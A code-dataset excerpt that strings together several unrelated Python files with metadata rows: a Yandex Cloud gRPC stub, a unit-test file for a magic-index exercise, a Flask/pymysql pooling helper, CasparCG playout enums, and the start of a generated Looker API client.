return grpc.experimental.unary_unary(request, target, '/yandex.cloud.compute.v1.instancegroup.InstanceGroupService/Stop',
yandex_dot_cloud_dot_compute_dot_v1_dot_instancegroup_dot_instance__group__service__pb2.StopInstanceGroupRequest.SerializeToString,
yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def Start(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/yandex.cloud.compute.v1.instancegroup.InstanceGroupService/Start',
yandex_dot_cloud_dot_compute_dot_v1_dot_instancegroup_dot_instance__group__service__pb2.StartInstanceGroupRequest.SerializeToString,
yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def Delete(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/yandex.cloud.compute.v1.instancegroup.InstanceGroupService/Delete',
yandex_dot_cloud_dot_compute_dot_v1_dot_instancegroup_dot_instance__group__service__pb2.DeleteInstanceGroupRequest.SerializeToString,
yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def ListInstances(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/yandex.cloud.compute.v1.instancegroup.InstanceGroupService/ListInstances',
yandex_dot_cloud_dot_compute_dot_v1_dot_instancegroup_dot_instance__group__service__pb2.ListInstanceGroupInstancesRequest.SerializeToString,
yandex_dot_cloud_dot_compute_dot_v1_dot_instancegroup_dot_instance__group__service__pb2.ListInstanceGroupInstancesResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def DeleteInstances(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/yandex.cloud.compute.v1.instancegroup.InstanceGroupService/DeleteInstances',
yandex_dot_cloud_dot_compute_dot_v1_dot_instancegroup_dot_instance__group__service__pb2.DeleteInstancesRequest.SerializeToString,
yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def StopInstances(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/yandex.cloud.compute.v1.instancegroup.InstanceGroupService/StopInstances',
yandex_dot_cloud_dot_compute_dot_v1_dot_instancegroup_dot_instance__group__service__pb2.StopInstancesRequest.SerializeToString,
yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def ListOperations(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/yandex.cloud.compute.v1.instancegroup.InstanceGroupService/ListOperations',
yandex_dot_cloud_dot_compute_dot_v1_dot_instancegroup_dot_instance__group__service__pb2.ListInstanceGroupOperationsRequest.SerializeToString,
yandex_dot_cloud_dot_compute_dot_v1_dot_instancegroup_dot_instance__group__service__pb2.ListInstanceGroupOperationsResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def ListLogRecords(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/yandex.cloud.compute.v1.instancegroup.InstanceGroupService/ListLogRecords',
yandex_dot_cloud_dot_compute_dot_v1_dot_instancegroup_dot_instance__group__service__pb2.ListInstanceGroupLogRecordsRequest.SerializeToString,
yandex_dot_cloud_dot_compute_dot_v1_dot_instancegroup_dot_instance__group__service__pb2.ListInstanceGroupLogRecordsResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def ListAccessBindings(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/yandex.cloud.compute.v1.instancegroup.InstanceGroupService/ListAccessBindings',
yandex_dot_cloud_dot_access_dot_access__pb2.ListAccessBindingsRequest.SerializeToString,
yandex_dot_cloud_dot_access_dot_access__pb2.ListAccessBindingsResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def SetAccessBindings(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/yandex.cloud.compute.v1.instancegroup.InstanceGroupService/SetAccessBindings',
yandex_dot_cloud_dot_access_dot_access__pb2.SetAccessBindingsRequest.SerializeToString,
yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def UpdateAccessBindings(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/yandex.cloud.compute.v1.instancegroup.InstanceGroupService/UpdateAccessBindings',
yandex_dot_cloud_dot_access_dot_access__pb2.UpdateAccessBindingsRequest.SerializeToString,
yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def ResumeProcesses(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/yandex.cloud.compute.v1.instancegroup.InstanceGroupService/ResumeProcesses',
yandex_dot_cloud_dot_compute_dot_v1_dot_instancegroup_dot_instance__group__service__pb2.ResumeInstanceGroupProcessesRequest.SerializeToString,
yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def PauseProcesses(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/yandex.cloud.compute.v1.instancegroup.InstanceGroupService/PauseProcesses',
yandex_dot_cloud_dot_compute_dot_v1_dot_instancegroup_dot_instance__group__service__pb2.PauseInstanceGroupProcessesRequest.SerializeToString,
yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
| 57.175793 | 182 | 0.723085 | 3,851 | 39,680 | 6.967022 | 0.04752 | 0.039583 | 0.061573 | 0.074767 | 0.91312 | 0.91312 | 0.910772 | 0.866865 | 0.860417 | 0.802982 | 0 | 0.007334 | 0.216482 | 39,680 | 693 | 183 | 57.258297 | 0.855645 | 0.052419 | 0 | 0.586325 | 1 | 0 | 0.103311 | 0.074142 | 0 | 0 | 0 | 0 | 0 | 1 | 0.068376 | false | 0 | 0.008547 | 0.032479 | 0.11453 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
1770e9f496a600c615075bec4cfe06e9e02c769a | 2,120 | py | Python | recursion_and_dynamic_programming/magic_index/test.py | hanjasn/ctci | 69c8c65d71e7f6e88b669dc402e64a0cf6223fbf | [
"MIT"
] | null | null | null | recursion_and_dynamic_programming/magic_index/test.py | hanjasn/ctci | 69c8c65d71e7f6e88b669dc402e64a0cf6223fbf | [
"MIT"
] | null | null | null | recursion_and_dynamic_programming/magic_index/test.py | hanjasn/ctci | 69c8c65d71e7f6e88b669dc402e64a0cf6223fbf | [
"MIT"
] | null | null | null | import unittest
from solution import *
from time import time
class FindingMagicIndexNonDistinctIntegersTest(unittest.TestCase):
def setUp(self) -> None:
self.sol = Solution1()
def test_1(self) -> None:
arr = [-3, -2, -1, 0, 4, 7, 9, 11]
self.assertEqual(4, self.sol.find_magic_index(arr))
def test_2(self) -> None:
arr = [1, 2, 3, 4, 5, 6, 7]
self.assertEqual(-1, self.sol.find_magic_index(arr))
def test_3(self) -> None:
arr = []
self.assertEqual(-1, self.sol.find_magic_index(arr))
def test_4(self) -> None:
arr = [100] * 101
self.assertEqual(100, self.sol.find_magic_index(arr))
def test_5(self) -> None:
arr = [i for i in range(1, 10**6)]
start = time()
self.sol.find_magic_index(arr)
print(f'{time() - start:.6f} seconds')
def test_6(self) -> None:
arr = [i for i in range(1, 10**7)]
start = time()
self.sol.find_magic_index(arr)
print(f'{time() - start:.6f} seconds')
class FindMagicIndexDistinctIntegersTest(unittest.TestCase):
def setUp(self) -> None:
self.sol = Solution2()
def test_1(self) -> None:
arr = [-3, -2, -1, 0, 4, 7, 9, 11]
self.assertEqual(4, self.sol.find_magic_index(arr))
def test_2(self) -> None:
arr = [1, 2, 3, 4, 5, 6, 7]
self.assertEqual(-1, self.sol.find_magic_index(arr))
def test_3(self) -> None:
arr = []
self.assertEqual(-1, self.sol.find_magic_index(arr))
def test_4(self) -> None:
arr = [i for i in range(1, 10**7)]
start = time()
self.sol.find_magic_index(arr)
print(f'{time() - start:.6f} seconds')
def test_5(self) -> None:
arr = [i for i in range(1, 10**8)]
start = time()
self.sol.find_magic_index(arr)
print(f'{time() - start:.6f} seconds')
def test_6(self) -> None:
arr = [-1] * 10**9
start = time()
self.sol.find_magic_index(arr)
print(f'{time() - start:.6f} seconds') | 29.859155 | 66 | 0.550472 | 303 | 2,120 | 3.732673 | 0.148515 | 0.099027 | 0.116711 | 0.169761 | 0.83908 | 0.83908 | 0.83908 | 0.83908 | 0.748895 | 0.748895 | 0 | 0.057448 | 0.293868 | 2,120 | 71 | 67 | 29.859155 | 0.698063 | 0 | 0 | 0.781818 | 0 | 0 | 0.066007 | 0 | 0 | 0 | 0 | 0 | 0.127273 | 1 | 0.254545 | false | 0 | 0.054545 | 0 | 0.345455 | 0.090909 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
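# solution.py is not included here; the following is a minimal sketch of what
# Solution1 and Solution2 might look like, assuming the classic CTCI
# approaches the test names suggest: Solution1 handles a sorted array whose
# values may repeat (both halves must be searched), while Solution2 assumes
# sorted, distinct integers and uses plain binary search.
class Solution1:
    def find_magic_index(self, arr: list) -> int:
        return self._search(arr, 0, len(arr) - 1)

    def _search(self, arr: list, lo: int, hi: int) -> int:
        if lo > hi:
            return -1
        mid = (lo + hi) // 2
        if arr[mid] == mid:
            return mid
        # Left half: a magic index can sit no further right than arr[mid].
        left = self._search(arr, lo, min(mid - 1, arr[mid]))
        if left >= 0:
            return left
        # Right half: a magic index can sit no further left than arr[mid].
        return self._search(arr, max(mid + 1, arr[mid]), hi)


class Solution2:
    def find_magic_index(self, arr: list) -> int:
        lo, hi = 0, len(arr) - 1
        while lo <= hi:
            mid = (lo + hi) // 2
            if arr[mid] == mid:
                return mid
            if arr[mid] < mid:
                lo = mid + 1
            else:
                hi = mid - 1
        return -1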
178a304045401ab4665df63bdcaf2b5aaef23f82 | 310 | py | Python | src/ebonite/build/runner/__init__.py | geffy/ebonite | 2d85eeca44ac1799e743bafe333887712e325060 | [
"Apache-2.0"
] | 1 | 2019-11-27T14:33:45.000Z | 2019-11-27T14:33:45.000Z | src/ebonite/build/runner/__init__.py | geffy/ebonite | 2d85eeca44ac1799e743bafe333887712e325060 | [
"Apache-2.0"
] | null | null | null | src/ebonite/build/runner/__init__.py | geffy/ebonite | 2d85eeca44ac1799e743bafe333887712e325060 | [
"Apache-2.0"
] | null | null | null | from .base import RunnerBase
from .simple_docker import DefaultDockerRegistry, DockerImage, DockerServiceInstance, RemoteDockerRegistry, \
SimpleDockerRunner
__all__ = ['RunnerBase', 'DefaultDockerRegistry', 'DockerImage', 'DockerServiceInstance',
'RemoteDockerRegistry', 'SimpleDockerRunner']
| 44.285714 | 109 | 0.793548 | 20 | 310 | 12.05 | 0.6 | 0.26556 | 0.439834 | 0.605809 | 0.755187 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.119355 | 310 | 6 | 110 | 51.666667 | 0.882784 | 0 | 0 | 0 | 0 | 0 | 0.325806 | 0.135484 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.4 | 0 | 0.4 | 0 | 1 | 0 | 1 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 7 |
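# A minimal sketch of what the __all__ list above controls: a wildcard import
# of this subpackage (path taken from the repo layout) exposes exactly the six
# re-exported names.
from ebonite.build.runner import *  # noqa: F401,F403

assert 'SimpleDockerRunner' in globals()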
178a69e31c4d7b231322e7517145b1de7fd9bba1 | 2,325 | py | Python | app/utils/db_utils.py | a1136395507/Blog | e890dbe24bd2c3a82dad55e90f717db59a3e51a1 | [
"Unlicense"
] | null | null | null | app/utils/db_utils.py | a1136395507/Blog | e890dbe24bd2c3a82dad55e90f717db59a3e51a1 | [
"Unlicense"
] | null | null | null | app/utils/db_utils.py | a1136395507/Blog | e890dbe24bd2c3a82dad55e90f717db59a3e51a1 | [
"Unlicense"
] | null | null | null | import pymysql
from flask import current_app
# Defines a helper class around a database connection pool, handling
# connecting, querying, and disconnecting.
# Call the appropriate method directly wherever it is needed.
class UserSQLHelper(object):
@staticmethod
# Open a pooled connection.
def open(cursor=pymysql.cursors.DictCursor):
# Fetch the connection pool from the current app's config.
POOL = current_app.config["SQL_USER_POOL"]
# Acquire a connection from the pool.
conn = POOL.connection()
cursor = conn.cursor(cursor=cursor)
return conn, cursor
@staticmethod
# Commit and close the connection.
def close(conn, cursor):
conn.commit()
cursor.close()
conn.close()
@classmethod
# Fetch a single row; implemented as a classmethod.
def fetch_one(cls, sql, *args, cursor=pymysql.cursors.DictCursor):
conn, cursor = cls.open(cursor)
if args:
cursor.execute(sql, args)
else:
cursor.execute(sql)
obj = cursor.fetchone()
cls.close(conn, cursor)
return obj
@classmethod
# Fetch all matching rows.
def fetch_all(cls, sql, *args, cursor=pymysql.cursors.DictCursor):
conn, cursor = cls.open(cursor)
if args:
cursor.execute(sql, args)
else:
cursor.execute(sql)
obj = cursor.fetchall()
cls.close(conn, cursor)
return obj
class ProductSQLHelper(object):
@staticmethod
# Open a pooled connection.
def open(cursor=pymysql.cursors.DictCursor):
# Fetch the connection pool from the current app's config.
POOL = current_app.config["SQL_PRODUCT_POOL"]
# Acquire a connection from the pool.
conn = POOL.connection()
cursor = conn.cursor(cursor=cursor)
return conn, cursor
@staticmethod
# Commit and close the connection.
def close(conn, cursor):
conn.commit()
cursor.close()
conn.close()
@classmethod
# Fetch a single row; implemented as a classmethod.
def fetch_one(cls, sql, *args, cursor=pymysql.cursors.DictCursor):
conn, cursor = cls.open(cursor)
if args:
cursor.execute(sql, args)
else:
cursor.execute(sql)
obj = cursor.fetchone()
cls.close(conn, cursor)
return obj
@classmethod
# Fetch all matching rows.
def fetch_all(cls, sql, *args, cursor=pymysql.cursors.DictCursor):
conn, cursor = cls.open(cursor)
if args:
cursor.execute(sql, args)
else:
cursor.execute(sql)
obj = cursor.fetchall()
cls.close(conn, cursor)
return obj
| 25 | 70 | 0.591398 | 244 | 2,325 | 5.590164 | 0.204918 | 0.102639 | 0.093842 | 0.131965 | 0.90176 | 0.90176 | 0.90176 | 0.90176 | 0.90176 | 0.90176 | 0 | 0 | 0.307527 | 2,325 | 92 | 71 | 25.271739 | 0.847205 | 0.082151 | 0 | 0.909091 | 0 | 0 | 0.013686 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.121212 | false | 0 | 0.030303 | 0 | 0.272727 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
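# A minimal usage sketch for the helpers above (import path taken from the
# repo layout; pool setup, table, and column names are assumptions). It
# presumes app.config["SQL_USER_POOL"] and app.config["SQL_PRODUCT_POOL"]
# were created elsewhere, e.g. with DBUtils' PooledDB(creator=pymysql, ...),
# and that the calls run inside a Flask application context.
from app.utils.db_utils import ProductSQLHelper, UserSQLHelper

user = UserSQLHelper.fetch_one(
    "SELECT id, name FROM users WHERE id = %s", 42)
products = ProductSQLHelper.fetch_all(
    "SELECT id, title FROM products LIMIT %s", 10)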
bd73558233191a5e70014a1957235ba1ec247387 | 5,997 | py | Python | Playout/Models/ccgEnums.py | mekhti/t4Playout | 1e45c93b48d4ce12c345108a5b2e31d33e395b24 | [
"MIT"
] | null | null | null | Playout/Models/ccgEnums.py | mekhti/t4Playout | 1e45c93b48d4ce12c345108a5b2e31d33e395b24 | [
"MIT"
] | 2 | 2019-12-18T00:05:30.000Z | 2020-07-09T07:42:02.000Z | Playout/Models/ccgEnums.py | mekhti/t4Playout | 1e45c93b48d4ce12c345108a5b2e31d33e395b24 | [
"MIT"
] | null | null | null |
class LoggingLevels():
TRAC = 'trace'
DEBG = 'debug'
INFO = 'info'
WARN = 'warning'
ERRO = 'error'
FATL = 'fatal'
Choices = (
(TRAC, 'trace'),
(DEBG, 'debug'),
(INFO, 'info'),
(WARN, 'warning'),
(ERRO, 'error'),
(FATL, 'fatal'),
)
class LogCategories():
COMM = 'communication'
CTRC = 'calltrace'
BOTH = 'calltrace,communication'
Choices = (
(COMM, 'communication'),
(CTRC, 'calltrace'),
(BOTH, 'calltrace,communication'),
)
class Accelerator():
AUTO = 'auto'
CPU = 'cpu'
GPU = 'gpu'
Choices = (
(AUTO, 'auto'),
(CPU, 'cpu'),
(GPU, 'gpu'),
)
class VIdeoMode():
VM_PAL = 'PAL'
VM_NTSC = 'NTSC'
VM_576p2500 = '576p2500'
VM_720p2398 = '720p2398'
VM_720p2400 = '720p2400'
VM_720p2500 = '720p2500'
VM_720p5000 = '720p5000'
VM_720p2997 = '720p2997'
VM_720p5994 = '720p5994'
VM_720p3000 = '720p3000'
VM_720p6000 = '720p6000'
VM_1080p2398 = '1080p2398'
VM_1080p2400 = '1080p2400'
VM_1080i5000 = '1080i5000'
VM_1080i5994 = '1080i5994'
VM_1080i6000 = '1080i6000'
VM_1080p2500 = '1080p2500'
VM_1080p2997 = '1080p2997'
VM_1080p3000 = '1080p3000'
VM_1080p5000 = '1080p5000'
VM_1080p5994 = '1080p5994'
VM_1080p6000 = '1080p6000'
VM_1556p2398 = '1556p2398'
VM_1556p2400 = '1556p2400'
VM_1556p2500 = '1556p2500'
VM_dci1080p2398 = 'dci1080p2398'
VM_dci1080p2400 = 'dci1080p2400'
VM_dci1080p2500 = 'dci1080p2500'
VM_2160p2398 = '2160p2398'
VM_2160p2400 = '2160p2400'
VM_2160p2500 = '2160p2500'
VM_2160p2997 = '2160p2997'
VM_2160p3000 = '2160p3000'
VM_2160p5000 = '2160p5000'
VM_2160p5994 = '2160p5994'
VM_2160p6000 = '2160p6000'
VM_dci2160p2398 = 'dci2160p2398'
VM_dci2160p2400 = 'dci2160p2400'
VM_dci2160p2500 = 'dci2160p2500'
Choices = (
(VM_PAL, 'PAL'),
(VM_NTSC, 'NTSC'),
(VM_576p2500, '576p2500'),
(VM_720p2398, '720p2398'),
(VM_720p2400, '720p2400'),
(VM_720p2500, '720p2500'),
(VM_720p5000, '720p5000'),
(VM_720p2997, '720p2997'),
(VM_720p5994, '720p5994'),
(VM_720p3000, '720p3000'),
(VM_720p6000, '720p6000'),
(VM_1080p2398, '1080p2398'),
(VM_1080p2400, '1080p2400'),
(VM_1080i5000, '1080i5000'),
(VM_1080i5994, '1080i5994'),
(VM_1080i6000, '1080i6000'),
(VM_1080p2500, '1080p2500'),
(VM_1080p2997, '1080p2997'),
(VM_1080p3000, '1080p3000'),
(VM_1080p5000, '1080p5000'),
(VM_1080p5994, '1080p5994'),
(VM_1080p6000, '1080p6000'),
(VM_1556p2398, '1556p2398'),
(VM_1556p2400, '1556p2400'),
(VM_1556p2500, '1556p2500'),
(VM_dci1080p2398, 'dci1080p2398'),
(VM_dci1080p2400, 'dci1080p2400'),
(VM_dci1080p2500, 'dci1080p2500'),
(VM_2160p2398, '2160p2398'),
(VM_2160p2400, '2160p2400'),
(VM_2160p2500, '2160p2500'),
(VM_2160p2997, '2160p2997'),
(VM_2160p3000, '2160p3000'),
(VM_2160p5000, '2160p5000'),
(VM_2160p5994, '2160p5994'),
(VM_2160p6000, '2160p6000'),
(VM_dci2160p2398, 'dci2160p2398'),
(VM_dci2160p2400, 'dci2160p2400'),
(VM_dci2160p2500, 'dci2160p2500'),
)
class AudioChannelsLayout():
MONO = 'mono'
STRO = 'stereo'
MTRX = 'matrix'
FILM = 'film'
SMPT = 'smpte'
ER8A = 'ebu_r123_8a'
ER8B = 'ebu_r123_8b'
A8CH = '8ch'
A16C = '16ch'
Choices = (
(MONO, 'mono'),
(STRO, 'stereo'),
(MTRX, 'matrix'),
(FILM, 'film'),
(SMPT, 'smpte'),
(ER8A, 'ebu_r123_8a'),
(ER8B, 'ebu_r123_8b'),
(A8CH, '8ch'),
(A16C, '16ch'),
)
class DecklinkLatency():
NORM = 'normal'
LOW = 'low'
DFLT = 'default'
Choices = (
(NORM, 'normal'),
(LOW, 'low'),
(DFLT, 'default'),
)
class DecklinkKeyer():
EXTR = 'external'
EXSD = 'external_separate_device'
INTR = 'internal'
DFLT = 'default'
Choices = (
(EXTR, 'external'),
(EXSD, 'external_separate_device'),
(INTR, 'internal'),
(DFLT, 'default'),
)
class BluefishSDIStream():
SDI_A = 'a'
SDI_B = 'b'
SDI_C = 'c'
SDI_D = 'd'
Choices = (
(SDI_A, 'a'),
(SDI_B, 'b'),
(SDI_C, 'c'),
(SDI_D, 'd'),
)
class BluefishKeyer():
EXTR = 'external'
INTR = 'internal'
DSBL = 'disabled'
Choices = (
(EXTR, 'external'),
(INTR, 'internal'),
(DSBL, 'disabled'),
)
class BluefishInternalKeyerAudioSource():
VIDO = 'videooutputchannel'
SDIO = 'sdivideoinput'
Choices = (
(VIDO, 'videooutputchannel'),
(SDIO, 'sdivideoinput'),
)
class ScreenAspectRatio():
DFLT = 'default'
AR_4_3 = '4:3'
AR_16_9 = '16:9'
Choices = (
(DFLT, 'default'),
(AR_4_3, '4:3'),
(AR_16_9, '16:9'),
)
class ScreenStretch():
NONE = 'none'
FILL = 'fill'
UNFR = 'uniform'
U2FL = 'uniform_to_fill'
Choices = (
(NONE, 'none'),
(FILL, 'fill'),
(UNFR, 'uniform'),
(U2FL, 'uniform_to_fill'),
)
class FFMPEGOutputType():
NONE = 'none'
FILE = 'file'
STRM = 'stream'
Choices = (
(NONE, 'none'),
(FILE, 'file'),
(STRM, 'stream'),
)
class StreamAudioCodec():
AAC = 'aac'
MP2 = 'mp2'
Choices = (
(AAC, 'aac'),
(MP2, 'mp2'),
)
class StreamVideoCodec():
H264 = 'libx264'
MPG2 = 'mpeg2video'
MJPG = 'mjpeg'
C264 = 'nvenc_264'
C265 = 'nvenc_265'
QSV4 = 'h264_qsv'
Choices = (
(H264, 'libx264'),
(MPG2, 'mpeg2video'),
(MJPG, 'mjpeg'),
(C264, 'nvenc_264'),
(C265, 'nvenc_265'),
(QSV4, 'h264_qsv'),
) | 24.181452 | 43 | 0.539103 | 543 | 5,997 | 5.740331 | 0.268877 | 0.021174 | 0.008341 | 0.01155 | 0.834777 | 0.834777 | 0.764838 | 0.728906 | 0.728906 | 0.728906 | 0 | 0.300359 | 0.303819 | 5,997 | 248 | 44 | 24.181452 | 0.446228 | 0 | 0 | 0.141631 | 0 | 0 | 0.241121 | 0.015675 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0.532189 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 9 |
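# The (value, label) pairs in each Choices tuple have the shape Django model
# fields expect, which these classes appear intended for. A hypothetical
# sketch (the model and field names are assumptions; the import path follows
# the repo layout):
from django.db import models

from Playout.Models.ccgEnums import AudioChannelsLayout, VIdeoMode


class ChannelConfig(models.Model):
    # Store one of the VIdeoMode values; Django renders the label in forms.
    video_mode = models.CharField(
        max_length=16, choices=VIdeoMode.Choices, default=VIdeoMode.VM_PAL)
    audio_layout = models.CharField(
        max_length=16, choices=AudioChannelsLayout.Choices,
        default=AudioChannelsLayout.STRO)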
bdb6a7e615e3a1d8be7f1fd7a2bd34d0b5186e68 | 73,274 | py | Python | looker_client_30/api/project_api.py | gustavs408650/looker_sdk_30 | 8b52449f216b2cb3b84f09e2856bcea1ed4a2b0c | [
"MIT"
] | null | null | null | looker_client_30/api/project_api.py | gustavs408650/looker_sdk_30 | 8b52449f216b2cb3b84f09e2856bcea1ed4a2b0c | [
"MIT"
] | null | null | null | looker_client_30/api/project_api.py | gustavs408650/looker_sdk_30 | 8b52449f216b2cb3b84f09e2856bcea1ed4a2b0c | [
"MIT"
] | 1 | 2019-11-12T10:05:51.000Z | 2019-11-12T10:05:51.000Z | # coding: utf-8
"""
Looker API 3.0 Reference
### Authorization The Looker API uses Looker **API3** credentials for authorization and access control. Looker admins can create API3 credentials on Looker's **Admin/Users** page. Pass API3 credentials to the **/login** endpoint to obtain a temporary access_token. Include that access_token in the Authorization header of Looker API requests. For details, see [Looker API Authorization](https://looker.com/docs/r/api/authorization) ### Client SDKs The Looker API is a RESTful system that should be usable by any programming language capable of making HTTPS requests. Client SDKs for a variety of programming languages can be generated from the Looker API's Swagger JSON metadata to streamline use of the Looker API in your applications. A client SDK for Ruby is available as an example. For more information, see [Looker API Client SDKs](https://looker.com/docs/r/api/client_sdks) ### Try It Out! The 'api-docs' page served by the Looker instance includes 'Try It Out!' buttons for each API method. After logging in with API3 credentials, you can use the \"Try It Out!\" buttons to call the API directly from the documentation page to interactively explore API features and responses. ### Versioning Future releases of Looker will expand this API release-by-release to securely expose more and more of the core power of Looker to API client applications. API endpoints marked as \"beta\" may receive breaking changes without warning. Stable (non-beta) API endpoints should not receive breaking changes in future releases. For more information, see [Looker API Versioning](https://looker.com/docs/r/api/versioning) # noqa: E501
OpenAPI spec version: 3.0.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from looker_client_30.api_client import ApiClient
class ProjectApi(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def all_git_branches(self, project_id, **kwargs): # noqa: E501
"""Get All Git Branchs # noqa: E501
### Get All Git Branches Returns a list of git branches in the project repository # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.all_git_branches(project_id, async=True)
>>> result = thread.get()
:param async bool
:param str project_id: Project Id (required)
:return: list[GitBranch]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.all_git_branches_with_http_info(project_id, **kwargs) # noqa: E501
else:
(data) = self.all_git_branches_with_http_info(project_id, **kwargs) # noqa: E501
return data
def all_git_branches_with_http_info(self, project_id, **kwargs): # noqa: E501
"""Get All Git Branchs # noqa: E501
### Get All Git Branches Returns a list of git branches in the project repository # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.all_git_branches_with_http_info(project_id, async=True)
>>> result = thread.get()
:param async bool
:param str project_id: Project Id (required)
:return: list[GitBranch]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['project_id'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method all_git_branches" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'project_id' is set
if ('project_id' not in params or
params['project_id'] is None):
